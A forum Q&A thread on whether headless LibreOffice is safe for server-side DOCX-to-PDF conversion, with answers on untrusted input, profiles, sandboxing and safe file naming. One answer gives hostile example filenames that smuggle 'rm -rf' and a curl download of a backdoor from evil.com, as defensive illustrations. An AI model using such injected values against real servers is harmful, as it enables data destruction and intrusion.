Is LibreOffice (headless) safe to use on a web server?

Time: 2019-03-08 20:47:39

Tags: reporting libreoffice

I have my-template.docx that I convert into my-report.docx with OpenXml and then into my-report.pdf with:

soffice --headless --convert-to pdf my-report.docx

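I have to say this feature is much appreciated. However, I could not find an answer here (CLI documentation), here (comparison with MS Office), or in my other post as to whether LibreOffice is safe for automation.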

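See this post from Microsoft, which says not to use Word for server-side automation. That raises the question: is LibreOffice safe for server-side automation? Basically, whenever a report is requested, I use C# to run soffice --headless --convert-to pdf my-report.docx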

Is that safe?

*Assume that no one else is trying to read my-report.docx

3 answers:

Answer 0: (score: 4)

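As long as you control the content of the input files, there should be no problem. Keep in mind that LibreOffice allows only one active instance per user profile, so if you want to process several documents in parallel, you should use separate user profiles.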
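A minimal sketch of the separate-profile idea, written in Python for brevity (the same argument list could be passed from C#). It assumes soffice is on the PATH and uses the -env:UserInstallation bootstrap variable to point each conversion at its own throwaway profile directory. The function names, the timeout value, and the profile prefix are illustrative assumptions, not part of the original answer.

```python
import subprocess
import tempfile
from pathlib import Path


def build_convert_command(docx_path, out_dir, profile_dir):
    """Build the soffice argument list for one isolated conversion."""
    # -env:UserInstallation expects a file:// URL pointing at the profile directory.
    profile_url = Path(profile_dir).resolve().as_uri()
    return [
        "soffice",
        f"-env:UserInstallation={profile_url}",
        "--headless",
        "--convert-to", "pdf",
        "--outdir", str(out_dir),
        str(docx_path),
    ]


def convert_to_pdf(docx_path, out_dir, timeout_seconds=120):
    """Convert one document with a temporary profile so parallel calls do not collide."""
    with tempfile.TemporaryDirectory(prefix="lo-profile-") as profile_dir:
        command = build_convert_command(docx_path, out_dir, profile_dir)
        # check=True raises CalledProcessError on a non-zero exit code;
        # timeout raises TimeoutExpired if the conversion hangs.
        subprocess.run(command, check=True, timeout=timeout_seconds)
    # soffice names the output after the input file, with the new extension.
    return Path(out_dir) / (Path(docx_path).stem + ".pdf")
```

Creating a fresh profile on every call adds some startup cost, so a small pool of long-lived profile directories (one per worker) may be a better fit for a busy site.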

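If you have untrusted input data, the whole matter becomes more complicated. Although a lot of work has gone into securing the code base, a desktop office suite is still a huge piece of software with many potential attack surfaces (macros, remote data connections, old binary file formats, etc.). While all of these features should be blocked in headless operation, you have to trust that there are no undiscovered bugs.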

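The rest of the Microsoft article does not apply to LibreOffice. Headless mode is designed not to interact with the desktop environment, and the user profile does not change anything in the system or depend on any desktop-related parts. The default build still depends on some GUI libraries, but if that really becomes a problem, there is an experimental build option to build a non-GUI version without any X / GTK / KDE library dependencies.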

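As an alternative, there are also some projects built on top of LibreOffice that try to make converting documents easier and may actually be faster, by pre-forking or by using the LibreOfficeKit API. Two examples are JODConverter and unoconv.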

Answer 1: (score: 2)

Moggi's answer is good. The only things I can add are:

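  1. You could consider improving security by running the LibreOffice (soffice) instance in some kind of sandbox (for example Docker). That way, if something goes rogue, the sandbox limits the potential damage.
  2. If your site is busy generating PDFs, starting the process every time can be an overhead. If that happens, using a layer on top (for example JODConverter) lets you start it once and reuse it many times.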
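The sandbox suggestion could look roughly like the sketch below, which only builds a docker run argument list. The image name my-libreoffice-image is hypothetical (any image that has soffice installed would do), and the memory limit and the /work mount point are assumptions chosen for illustration.

```python
from pathlib import Path


def build_sandboxed_command(work_dir, docx_name, image="my-libreoffice-image"):
    """Build a `docker run` argument list that converts one file inside a container."""
    host_dir = Path(work_dir).resolve()
    return [
        "docker", "run",
        "--rm",                     # remove the container when it exits
        "--network", "none",        # no network access from inside the container
        "--cap-drop", "ALL",        # drop all Linux capabilities
        "--memory", "1g",           # cap memory use (assumed value)
        "-v", f"{host_dir}:/work",  # only this directory is visible to the container
        "-w", "/work",
        image,                      # hypothetical image name
        "soffice", "--headless", "--convert-to", "pdf", "--outdir", "/work", docx_name,
    ]
```

The list can be handed to subprocess.run(command, check=True, timeout=120). Depending on the image, the container user may need write permission on the mounted directory.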

I hope that helps.

Answer 2: (score: 1)

I have my-template.docx that I convert into my-report.docx with OpenXml and then my-report.pdf with:

soffice --headless --convert-to pdf my-report.docx

TL;DR: in your case, it is.

What you're almost certainly doing is replacing some information inside the DOCX and using LibreOffice to have a "nice" conversion to PDF. While there are other tools that might do something like that (wkhtmltopdf for example), you're not using LibreOffice in any vulnerable way that I'm aware of (and I use LibreOffice like you do too):

  • the source document is under your control (no user-entered macros, remote file inclusions, remote data sources or other shenanigans)
  • the values you inject into the DOCX are also under your control - or are they? - and do not contain user input such as HREF targets that might make it into the PDF.
  • LibreOffice in headless mode does not expose any open ports or interfaces that might be exploited by a third process.

Possible but unlikely "exploit" avenues that might remain:

  • the destination file. I expect that even if you asked the user for the name of the resulting file, you would still create a unique PDF filename on disk and send the user's chosen name only as Content-Disposition: attachment; filename="thatswhatshesaid";, instead of using the user's filename on your filesystem, risking saving data to byebye.pdf && rm -rf ... (or irrelevant.pdf\x00; curl -o index2.php http://evil.com/backdoor.php or...), and sending back a Location: downloads/whatshesaid.pdf.
  • very large values in the XML output that might trigger anomalous behaviour. Chances of this happening, and of doing so in any meaningful (for the attacker) way, are negligible, but still, nothing's wrong with checking.
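The two remaining avenues can be guarded with a few lines of code. The sketch below is one possible approach in Python, not something taken from the answer: new_storage_name, content_disposition, check_field and the MAX_FIELD_LENGTH limit are all hypothetical names and values chosen for illustration.

```python
import re
import uuid

MAX_FIELD_LENGTH = 10_000  # assumed limit; pick one that fits your reports


def new_storage_name():
    """Name used on the server's filesystem; never derived from user input."""
    return f"{uuid.uuid4().hex}.pdf"


def content_disposition(user_filename, fallback="report.pdf"):
    """Build a Content-Disposition header value from a user-supplied display name."""
    # Keep only a conservative set of characters; everything else is dropped.
    cleaned = re.sub(r"[^A-Za-z0-9._-]", "", user_filename).lstrip(".")
    if not cleaned:
        cleaned = fallback
    if not cleaned.lower().endswith(".pdf"):
        cleaned += ".pdf"
    return f'attachment; filename="{cleaned}"'


def check_field(value, limit=MAX_FIELD_LENGTH):
    """Reject suspiciously long values before injecting them into the DOCX."""
    if len(value) > limit:
        raise ValueError(f"value of {len(value)} characters exceeds limit {limit}")
    return value
```

The user's name only ever appears in the response header, while the file on disk gets a random name, so shell metacharacters or NUL bytes in the requested name never reach the filesystem or a command line.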